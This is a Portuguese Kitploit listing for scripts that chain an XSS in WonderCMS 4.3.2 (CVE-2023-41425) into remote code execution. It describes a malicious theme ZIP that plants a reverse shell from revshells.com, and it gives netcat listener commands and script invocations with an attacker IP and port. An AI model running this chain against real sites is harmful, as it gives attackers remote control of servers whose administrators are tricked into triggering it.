Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
Ferramentas/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Geração de PayloadsExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

WonderCMS 4.3.2 XSS to RCE Exploits

Visão Geral

Estes scripts exploram uma vulnerabilidade XSS (Cross-Site Scripting) no WonderCMS 4.3.2 para alcançar Execução Remota de Código (RCE). O payload XSS, quando acionado pelo administrador, instala automaticamente um reverse shell no servidor alvo, aproveitando um módulo de tema malicioso personalizado. O reverse shell é obtido do revshells.com e executado, concedendo ao atacante acesso remoto ao servidor.


Índice

  • Pré-requisitos
  • Script 1: Exploração Automática
    • Funcionalidades
    • Uso
  • Script 2: Exploração Manual
    • Funcionalidades
    • Uso
  • Notas
  • Licença

Pré-requisitos

Para executar com sucesso qualquer um dos scripts, as seguintes ferramentas e condições são necessárias:

  1. Bash Shell: Ambos os scripts são escritos para ambientes Linux usando o shell Bash.
  2. netcat (nc): Usado para ouvir a conexão do reverse shell.
  3. Python3: Um servidor HTTP simples em Python é usado para hospedar o payload XSS.
  4. WonderCMS 4.3.2: O alvo deve estar executando uma versão vulnerável do WonderCMS.
  5. Interação do Administrador: O payload requer que um administrador acione o XSS, o que resulta na execução do reverse shell.
  6. revshells.com: O payload do reverse shell é baixado dinamicamente do revshells.com.

Script 1: Exploração Automática

POC

Pasted image 20241010021603

Funcionalidades

Esta versão da exploração verifica automaticamente se há um listener nc ativo, baixa o reverse shell, inicia o servidor HTTP, envia o payload e aguarda que o administrador acione o reverse shell.

  • Configuração Automática do Reverse Shell: Baixa um reverse shell pré-gerado do revshells.com.
  • Injeção de Payload XSS: Injeta um payload XSS no formulário de contato do alvo.
  • Gerenciamento do Servidor HTTP: Inicia automaticamente um servidor HTTP Python para hospedar o payload do reverse shell.
  • Verificação do Listener nc: Garante que o listener esteja em execução antes de prosseguir.
  • Envio Automático do Payload: Envia o payload automaticamente sem interação do usuário.

Uso

  1. Certifique-se de que o listener nc está em execução na porta especificada:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Execute o script com o seguinte comando:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Exemplo:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Fluxo de Trabalho

  1. Download do Reverse Shell: O script baixa o reverse shell do revshells.com.
  2. Modificação do Reverse Shell: O script do reverse shell é atualizado com o IP e porta do atacante.
  3. Criação do Payload ZIP: Um arquivo ZIP contendo o reverse shell é criado.
  4. Elaboração do Payload XSS: Um payload XSS que instala o reverse shell é gerado e injetado no formulário de contato vulnerável.
  5. Início Automático do Servidor HTTP: O script inicia um servidor HTTP Python para servir o payload malicioso.
  6. Envio Automático do Payload: O payload XSS é enviado ao administrador automaticamente.

Script 2: Exploração Manual

POC

Pasted image 20241010013048

Use o exploit fornecido pelo script no campo Website...

Pasted image 20241010013218

Funcionalidades

Esta versão exige que o usuário gerencie manualmente o listener nc e o acionamento do payload XSS. É mais adequada para cenários onde processos automáticos não são desejáveis.

  • Configuração Manual do Reverse Shell: O usuário é responsável por garantir que o listener esteja em execução.
  • Acionamento Manual do XSS: O script fornece o link malicioso a ser enviado ao administrador, mas o payload deve ser acionado manualmente.
  • Gerenciamento do Servidor HTTP: Inicia um servidor HTTP Python para hospedar o payload XSS.

Uso

  1. Certifique-se de que o listener nc está em execução na porta especificada:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Execute o script com o seguinte comando:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Exemplo:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Fluxo de Trabalho

  1. Download do Reverse Shell: Baixa um reverse shell do revshells.com.
  2. Modificação do Reverse Shell: Atualiza o reverse shell com o IP e porta do atacante.
  3. Criação do Payload ZIP: Cria um arquivo ZIP contendo o reverse shell.
  4. Elaboração do Payload XSS: Gera um payload XSS que instala o reverse shell.
  5. Exibição do Link Malicioso: Exibe o link que precisa ser enviado ao administrador para acionamento.
  6. Início do Servidor HTTP: Inicia um servidor HTTP Python para hospedar o payload.

Notas

  • Interação do Administrador: Ambas as explorações dependem de o administrador do WonderCMS acionar o payload XSS ao visitar a página vulnerável. Uma vez acionado, o reverse shell é estabelecido com a máquina do atacante.
  • Firewall/IDS/IPS: Tenha cuidado ao executar essas explorações em ambientes protegidos por firewalls ou Sistemas de Detecção de Intrusão (IDS) que possam bloquear ou alertar sobre atividades suspeitas.
  • Divulgação Responsável: Se você descobrir que um alvo está vulnerável, sempre siga as diretrizes éticas e reporte a vulnerabilidade às partes apropriadas.

Licença

Baixar ferramenta